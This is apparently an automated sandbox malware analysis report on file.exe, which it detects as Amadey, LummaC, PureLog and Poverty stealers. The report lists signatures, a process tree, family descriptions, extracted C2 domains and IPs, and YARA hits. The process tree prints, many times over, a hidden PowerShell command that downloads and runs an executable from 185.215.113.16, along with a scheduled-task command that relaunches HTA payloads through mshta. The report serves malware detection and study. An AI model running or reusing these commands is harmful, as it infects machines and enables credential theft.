Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1585203
MD5:	7638e458b00be1a00936ab9419267621
SHA1:	af82d1c612dc47fb72a4798cbc42057bcc941602
SHA256:	12df5f413434f02531f88b0727b96ae8d4ed3c278fc81583dbfd4c0145b43e74
Tags:	exeuser-Bitsight
Infos:

Detection

Amadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Powershell download and execute file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys Clipper DLL

Yara detected Amadeys stealer DLL

Yara detected Babadeda

Yara detected LummaC Stealer

Yara detected Poverty Stealer

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected obfuscated html page

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains very large array initializations

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to start a terminal service

Creates HTA files

Creates multiple autostart registry keys

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Powershell drops PE file

Sample uses string decryption to hide its real strings

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: PowerShell DownloadFile

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: Suspicious MSHTA Child Process

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to download and execute files (via powershell)

Tries to evade debugger and weak emulator (self modifying code)

Uses schtasks.exe or at.exe to add and modify task schedules

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Too many similar processes found

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

file.exe (PID: 5232 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7638E458B00BE1A00936AB9419267621)

skotes.exe (PID: 6876 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 7638E458B00BE1A00936AB9419267621)

skotes.exe (PID: 4900 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 7638E458B00BE1A00936AB9419267621)

skotes.exe (PID: 7768 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 7638E458B00BE1A00936AB9419267621)

1759c0aff4.exe (PID: 7964 cmdline: "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" MD5: 4D140076DE73C646ABAC6DF1FE85851C)

conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8012 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\7A54.tmp\7A55.tmp\7A56.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 8028 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" any_word MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

1759c0aff4.exe (PID: 8088 cmdline: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word MD5: 4D140076DE73C646ABAC6DF1FE85851C)

cmd.exe (PID: 8104 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\7B1F.tmp\7B20.tmp\7B21.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

timeout.exe (PID: 8120 cmdline: timeout /t 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)

cmd.exe (PID: 8144 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 8160 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7212 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7224 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)

mshta.exe (PID: 3156 cmdline: mshta "C:\Temp\.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 7484 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2912 cmdline: schtasks /delete /tn "AutoRunHTA" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3716 cmdline: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 5812 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1848 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" any_word MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1364 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

powershell.exe (PID: 6280 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 7252 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

powershell.exe (PID: 7272 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

mshta.exe (PID: 2412 cmdline: mshta "C:\Temp\.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 7432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

483d2fa8a0d53818306efeb32d3.exe (PID: 6448 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 2314D4E1D1134D797121BF79B03C2A4C)

schtasks.exe (PID: 3004 cmdline: schtasks /delete /tn "AutoRunHTA" /f MD5: 48C2FE20575769DE916F48EF0676A965)

schtasks.exe (PID: 7564 cmdline: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 6324 cmdline: cmd.exe /c for %f in ("C:\Temp\*.gif") do (copy "%f" "C:\Temp\\random.hta" & start mshta "C:\Temp\\random.hta") MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 3964 cmdline: mshta "C:\Temp\\random.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 1516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

483d2fa8a0d53818306efeb32d3.exe (PID: 2336 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 2314D4E1D1134D797121BF79B03C2A4C)

mshta.exe (PID: 5212 cmdline: mshta "C:\Temp\\random.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

svchost.exe (PID: 6416 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

1759c0aff4.exe (PID: 6356 cmdline: "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" MD5: 4D140076DE73C646ABAC6DF1FE85851C)

conhost.exe (PID: 6128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3848 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\A6C3.tmp\A6C4.tmp\A6C5.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 4180 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" any_word MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

1759c0aff4.exe (PID: 3756 cmdline: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word MD5: 4D140076DE73C646ABAC6DF1FE85851C)

cmd.exe (PID: 5780 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\A859.tmp\A85A.tmp\A85B.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 2504 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 3104 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 5416 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 3384 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)

mshta.exe (PID: 7408 cmdline: mshta "C:\Temp\.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 6964 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

483d2fa8a0d53818306efeb32d3.exe (PID: 8048 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 2314D4E1D1134D797121BF79B03C2A4C)

schtasks.exe (PID: 7888 cmdline: schtasks /delete /tn "AutoRunHTA" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6944 cmdline: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

Conhost.exe (PID: 2816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6876 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5080 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" any_word MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1376 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7184 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7292 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7244 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)

mshta.exe (PID: 4108 cmdline: mshta "C:\Temp\.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 5316 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

483d2fa8a0d53818306efeb32d3.exe (PID: 2844 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 2314D4E1D1134D797121BF79B03C2A4C)

schtasks.exe (PID: 3864 cmdline: schtasks /delete /tn "AutoRunHTA" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8108 cmdline: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

1759c0aff4.exe (PID: 3904 cmdline: "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" MD5: 4D140076DE73C646ABAC6DF1FE85851C)

conhost.exe (PID: 5308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6332 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\E870.tmp\E871.tmp\E881.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 3672 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" any_word MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

1759c0aff4.exe (PID: 3412 cmdline: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word MD5: 4D140076DE73C646ABAC6DF1FE85851C)

cmd.exe (PID: 1852 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\E9E7.tmp\E9E8.tmp\E9E9.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 5788 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7504 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 3612 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 6128 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)

mshta.exe (PID: 2504 cmdline: mshta "C:\Temp\.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 6156 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

483d2fa8a0d53818306efeb32d3.exe (PID: 5244 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 2314D4E1D1134D797121BF79B03C2A4C)

schtasks.exe (PID: 2056 cmdline: schtasks /delete /tn "AutoRunHTA" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6288 cmdline: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

Conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5356 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5768 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" any_word MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7484 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7444 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7180 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7192 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)

mshta.exe (PID: 7268 cmdline: mshta "C:\Temp\.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 7284 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4900 cmdline: schtasks /delete /tn "AutoRunHTA" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2128 cmdline: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Babadeda	According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.	No Attribution	https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities	https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

Malware Configuration

Threatname: LummaC

{"C2 url": ["wholersorie.shop", "noisycuttej.shop", "cureprouderio.click", "tirepublicerj.shop", "abruptyopsn.shop", "rabidcowse.shop", "nearycrepso.shop", "framekgirus.shop", "cloudewahsj.shop"], "Build id": "LPnhqo--hcxnojluavhd"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Temp\CucWPjLzJ.txt	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Temp\random.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Temp\.gif	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Temp\erFIq31tw.txt	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Temp\A9Dfw7SLp.txt	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Temp\w9dhIoFqs.txt	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Users\user\AppData\Local\Temp\1032672001\VDoTjfk.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Temp\WkYLwajB0.txt	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Temp\CAvWBYtqI.txt	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
C:\Users\user\AppData\Local\Temp\1032914001\ZNWzk16.exe	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ZNWzk16[1].exe	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\artVssK[1].exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\VDoTjfk[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1032624001\tbd0KQd.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tbd0KQd[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1032645001\artVssK.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
Click to see the 13 entries

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
